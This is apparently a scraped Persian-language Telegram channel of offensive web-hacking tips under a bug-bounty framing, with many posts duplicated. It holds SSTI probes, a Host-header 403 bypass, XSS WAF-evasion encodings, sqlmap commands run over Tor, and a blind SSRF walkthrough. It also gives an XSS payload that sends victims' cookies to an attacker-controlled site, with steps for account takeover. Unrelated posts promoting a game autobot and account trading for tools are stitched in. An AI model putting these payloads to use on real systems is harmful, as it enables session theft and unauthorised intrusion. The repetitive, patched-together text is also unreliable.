اگر قسمت های نام کاربری و نام خانوادگی شما در برابر تزریق HTML آسیب پذیر است، آسیب پذیری SSTI را نیز امتحان کنید! SSTI را می توان با RCE ساخت. این یک SSTI Payload معمولی است.
{{ '7'*7 }}
و در اخر باید شناسایی کنیم که از چه موتور قالبی در back-end استفاده می شود تا بتوانیم RCE را بیشتر مورد بهره برداری قرار دهیم.
{{ 7*'7′ }}= 7777777 == Its Jinja2 Engine
{{ 7*'7′ }}= 49 == Its Twig Engine
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
{{ '7'*7 }}
و در اخر باید شناسایی کنیم که از چه موتور قالبی در back-end استفاده می شود تا بتوانیم RCE را بیشتر مورد بهره برداری قرار دهیم.
{{ 7*'7′ }}= 7777777 == Its Jinja2 Engine
{{ 7*'7′ }}= 49 == Its Twig Engine
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
ریکوئست:
GET /admin
Host: test.com
ریسپانس: 403
فقط با تغییر دامنه میزبان به 127.0.0.1 می توانید 403 را دور بزنید
ریکوئست:
GET /admin
Host: 127.0.0.1
ریسپانس: 200 OK
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
GET /admin
Host: test.com
ریسپانس: 403
فقط با تغییر دامنه میزبان به 127.0.0.1 می توانید 403 را دور بزنید
ریکوئست:
GET /admin
Host: 127.0.0.1
ریسپانس: 200 OK
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
دور زدن Cloudfront XSS WAF
1) window["al"+"ert"]
2) دور زدن () با ``
3) فضا را با / جایگزین کنید
4) رمزگذاری نمادها:
🔹< = %3c
🔹> = %3e
🔹" = %22
🔹[ = %5b
🔹] = %5d
🔹``
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
1) window["al"+"ert"]
2) دور زدن () با ``
3) فضا را با / جایگزین کنید
4) رمزگذاری نمادها:
🔹< = %3c
🔹> = %3e
🔹" = %22
🔹[ = %5b
🔹] = %5d
🔹``
= %60
مثال بدونه رمزنگاری:
<svg/onload=window["al"+"ert"]
1337
>┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
تزریق SQL مبتنی بر زمان (Time-Based) یک تکنیک تزریق استنباطی SQL است که بر ارسال یک درخواست SQL به پایگاه داده تکیه دارد که پایگاه داده را مجبور میکند برای مدت زمان مشخصی (بر حسب ثانیه) قبل از پاسخگویی منتظر بماند.
برخی پیلود ها در تصویر است
#Sqli
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
برخی پیلود ها در تصویر است
#Sqli
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
تزریق Sql بر روی فرم ها
1. sqlmap -u target.com/registration --dbs --forms --crawl=2
2. تمام پیوندهای دارای فیلد ورودی را می خزد
3. پارامتری را که می خواهید آزمایش کنید انتخاب کنید
#Sqli #Sqlmap
1. sqlmap -u target.com/registration --dbs --forms --crawl=2
2. تمام پیوندهای دارای فیلد ورودی را می خزد
3. پارامتری را که می خواهید آزمایش کنید انتخاب کنید
#Sqli #Sqlmap
Team Exploit
تزریق Sql بر روی فرم ها 1. sqlmap -u target.com/registration --dbs --forms --crawl=2 2. تمام پیوندهای دارای فیلد ورودی را می خزد 3. پارامتری را که می خواهید آزمایش کنید انتخاب کنید #Sqli #Sqlmap
اگه میخواید تو Sqlmap هنگام اسکن از تور استفاده کنید
از این کامند استفاده کنید
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
از این کامند استفاده کنید
sqlmap -u "http://target_server/" --tor --tor-type=SOCKS5#Sqli #Sqlmap
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
دیگه اصولا تارگتتون باید نسبت به این علائم واکنش نشون بده! (برای تست اسیب پذیری)
#Sqli
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
#Sqli
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
نکات پاداش باگ!!!
SSRF بلایند از طریق دانلود کننده URL آپلود تصویر در
https://example{.}com
مراحل تولید مثل
1. یک حساب آزمایشی ایجاد کنید.
2. وارد آن حساب کاربری شوید.
3.به ویرایش نمایه بروید.
4. به پایین بروید.
5.به فیلد تصویر کاربر توجه کنید.
6. سعی کنید چیزی را آپلود کنید.
7. URL downloader را خواهید دید.
8. کلیبتور کلاینت برپ خود را باز کنید.
9. payload را در URL downloader کپی و جایگذاری کنید، مطمئن شوید که /test.png را در انتهای آن مانند example.com/test.png قرار دهید.
10. اکنون در کلاینت کلیبتور برپ نظرسنجی کنید.
11. به تعامل HTTP و DNS توجه کنید. آدرس IP از تعامل HTTP از شبکه داخلی است که به این معنی است که ما می توانیم برخی از مشکلات میان افزاری را انجام دهیم. توجه داشته باشید که در حال واکشی فایل test.png است. و IP از شبکه داخلی است.
12. پروکسی فاکسی خود را روشن کنید و برپ سوییت خود را باز کنید.
13. این ipv4 را در URL downloader قرار دهید: http://127.0.0.1/test.png
14. درخواست رهگیری. درخواست
15. متوجه یک خطا خواهید شد که برخی از اطلاعات مربوط به سرور را نشان می دهد که دوباره Blind SSRF را تأیید می کند.
16. ضمناً اگر به پورت 25 تغییر دهید، چیزی در مورد سرور Postfix SMTP لو میرود.
همچنین من توانستم تشخیص دهم که برنامه وب (فلانی) از libcurl استفاده می کند.
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
SSRF بلایند از طریق دانلود کننده URL آپلود تصویر در
https://example{.}com
مراحل تولید مثل
1. یک حساب آزمایشی ایجاد کنید.
2. وارد آن حساب کاربری شوید.
3.به ویرایش نمایه بروید.
4. به پایین بروید.
5.به فیلد تصویر کاربر توجه کنید.
6. سعی کنید چیزی را آپلود کنید.
7. URL downloader را خواهید دید.
8. کلیبتور کلاینت برپ خود را باز کنید.
9. payload را در URL downloader کپی و جایگذاری کنید، مطمئن شوید که /test.png را در انتهای آن مانند example.com/test.png قرار دهید.
10. اکنون در کلاینت کلیبتور برپ نظرسنجی کنید.
11. به تعامل HTTP و DNS توجه کنید. آدرس IP از تعامل HTTP از شبکه داخلی است که به این معنی است که ما می توانیم برخی از مشکلات میان افزاری را انجام دهیم. توجه داشته باشید که در حال واکشی فایل test.png است. و IP از شبکه داخلی است.
12. پروکسی فاکسی خود را روشن کنید و برپ سوییت خود را باز کنید.
13. این ipv4 را در URL downloader قرار دهید: http://127.0.0.1/test.png
14. درخواست رهگیری. درخواست
15. متوجه یک خطا خواهید شد که برخی از اطلاعات مربوط به سرور را نشان می دهد که دوباره Blind SSRF را تأیید می کند.
16. ضمناً اگر به پورت 25 تغییر دهید، چیزی در مورد سرور Postfix SMTP لو میرود.
همچنین من توانستم تشخیص دهم که برنامه وب (فلانی) از libcurl استفاده می کند.
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
نکات باگ بانتی: در اینجا نحوه افزایش مشکلات XSS به ATO وجود دارد👇
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
Team Exploit
نکات باگ بانتی: در اینجا نحوه افزایش مشکلات XSS به ATO وجود دارد👇 ┌<(channel>>>>)-[~] └< (main)* >─» @Team_Exploit
آیا اسیب پذیری XSS را شناسایی کرده اید؟ خیلی سریع آن را با alert (1) یا alert (document.cookie) برای پرداخت متوسط گزارش نکنید.
در اینجا نحوه افزایش مشکلات XSS به یک ATO برای پاداش های بسیار بالاتر آمده است:
1️⃣همیشه کوکی های مبتنی بر سشن Exfiltrating را در سرور کنترل شده خود امتحان کنید. این یک پیلود ساده است که می توانید برای نشان دادن ATO استفاده کنید:
2️⃣اگر کوکیها بهعنوان HTTPOnly تنظیم شدهاند، با انجام اقدامات حساس سمت کلاینت، مانند تغییر آدرس ایمیل یا رمز عبور کاربر که منجر به ATO میشود، تأثیر را تشدید کنید.
3️⃣اگر اقدامات حساس سمت سرویس گیرنده امکان پذیر نیست، کوکی ها یا نشانه های سشن لو رفته را در پاسخ های سرور در همه صفحات بررسی کنید. از پیلود XSS خود استفاده کنید تا آنها را به سرور کنترل شده خود منتقل کنید تا ATO دریافت کنید
4️⃣اگر هیچ کوکی سشن یا نشانهای در هیچ صفحهای یافت نشد، فضای ذخیرهسازی محلی مرورگر را برای نشانههای سشن ذخیرهشده بررسی کنید و بر این اساس محموله XSS خود را بسازید تا آنها را به سرور خود که منجر به ATO میشود، منتقل کنید.
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
در اینجا نحوه افزایش مشکلات XSS به یک ATO برای پاداش های بسیار بالاتر آمده است:
1️⃣همیشه کوکی های مبتنی بر سشن Exfiltrating را در سرور کنترل شده خود امتحان کنید. این یک پیلود ساده است که می توانید برای نشان دادن ATO استفاده کنید:
"><img src="x" onerror="document.location.href='https://yoursite(.)com?cookies=' + document.cookie + '' ">این پیلود کوکیهای کاربر را استخراج کرده و به سایت شما ارسال میکند. یک ویدیوی اثبات مفهوم (PoC) ایجاد کنید که نشان میدهد چگونه میتوان از این کوکیها برای تصاحب سشن کاربر استفاده کرد. یک درخواست به هر API تأیید شده ارسال کنید و نشان دهید که کوکی ها کار می کنند.
2️⃣اگر کوکیها بهعنوان HTTPOnly تنظیم شدهاند، با انجام اقدامات حساس سمت کلاینت، مانند تغییر آدرس ایمیل یا رمز عبور کاربر که منجر به ATO میشود، تأثیر را تشدید کنید.
3️⃣اگر اقدامات حساس سمت سرویس گیرنده امکان پذیر نیست، کوکی ها یا نشانه های سشن لو رفته را در پاسخ های سرور در همه صفحات بررسی کنید. از پیلود XSS خود استفاده کنید تا آنها را به سرور کنترل شده خود منتقل کنید تا ATO دریافت کنید
4️⃣اگر هیچ کوکی سشن یا نشانهای در هیچ صفحهای یافت نشد، فضای ذخیرهسازی محلی مرورگر را برای نشانههای سشن ذخیرهشده بررسی کنید و بر این اساس محموله XSS خود را بسازید تا آنها را به سرور خود که منجر به ATO میشود، منتقل کنید.
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
Team Exploit
آیا اسیب پذیری XSS را شناسایی کرده اید؟ خیلی سریع آن را با alert (1) یا alert (document.cookie) برای پرداخت متوسط گزارش نکنید. در اینجا نحوه افزایش مشکلات XSS به یک ATO برای پاداش های بسیار بالاتر آمده است: 1️⃣همیشه کوکی های مبتنی بر سشن Exfiltrating را…
نتیجه: همیشه به دنبال راههایی برای افزایش مشکلات XSS به ATO باشید، زیرا این امر بهطور بالقوه میتواند مبلغ بانتی برای آن گزارش را 2 تا 10 برابر افزایش دهد!
Team Exploit
جهیدم
ربات خودکار همستر کمبت
ویژگی ها:
🟢 تنظیم خودکار
🟢 کلیک خودکار برای بسیاری از حساب ها
🟢 چند رشته ای
🟢 منوی مناسب
🟢 پروکسی های رایگان
🟢 پشتیبانی از اکثر سیستم ها: Windows 7/8/8.1/10/11 (x32/64).
Link: https://github.com/Pratapsalgar/hamster-kombat-autobot
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
ویژگی ها:
🟢 تنظیم خودکار
🟢 کلیک خودکار برای بسیاری از حساب ها
🟢 چند رشته ای
🟢 منوی مناسب
🟢 پروکسی های رایگان
🟢 پشتیبانی از اکثر سیستم ها: Windows 7/8/8.1/10/11 (x32/64).
Link: https://github.com/Pratapsalgar/hamster-kombat-autobot
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
دوستان
اگر اکانت کالاف دیوتی موبایل دارید میتونید با یکی یا چندتا از ابزار ها طاق بزنید!
نکته درباره اکانت:
کرکی نباشه
حداقل ارزشش بالای 1M باشه
ابزار ها+ایدی
https://t.me/KnightGuardian59/119
اگر اکانت کالاف دیوتی موبایل دارید میتونید با یکی یا چندتا از ابزار ها طاق بزنید!
نکته درباره اکانت:
کرکی نباشه
حداقل ارزشش بالای 1M باشه
ابزار ها+ایدی
https://t.me/KnightGuardian59/119